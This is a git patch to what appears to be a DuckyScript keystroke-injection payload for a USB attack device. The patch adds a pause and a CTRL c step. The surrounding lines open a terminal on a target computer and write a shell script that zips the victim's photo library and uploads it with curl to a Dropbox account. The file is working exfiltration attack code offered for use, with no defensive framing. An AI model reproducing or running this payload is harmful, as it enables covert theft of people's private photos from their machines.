From cc4c2b7d9dba883c29384284a79d245f8d39febb Mon Sep 17 00:00:00 2001 From: Narsty Date: Wed, 21 Jun 2023 13:41:05 -0500 Subject: [PATCH] Added CTRL c to guarantee the execution continues in the terminal iCloud Photos to Dropbox.txt --- Executions/iCloud Photos to Dropbox.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Executions/iCloud Photos to Dropbox.txt b/Executions/iCloud Photos to Dropbox.txt index 127cfa8..1ad1763 100644 --- a/Executions/iCloud Photos to Dropbox.txt +++ b/Executions/iCloud Photos to Dropbox.txt @@ -46,6 +46,8 @@ DELAY 500 STRING terminal DELAY 1000 ENTER +DELAY 500 +CTRL c DELAY 1000 STRING echo 'cd ~/Desktop && zip -r targets_photos.zip Libraries && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/targets_photos.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @targets_photos.zip' > upload.sh DELAY 1000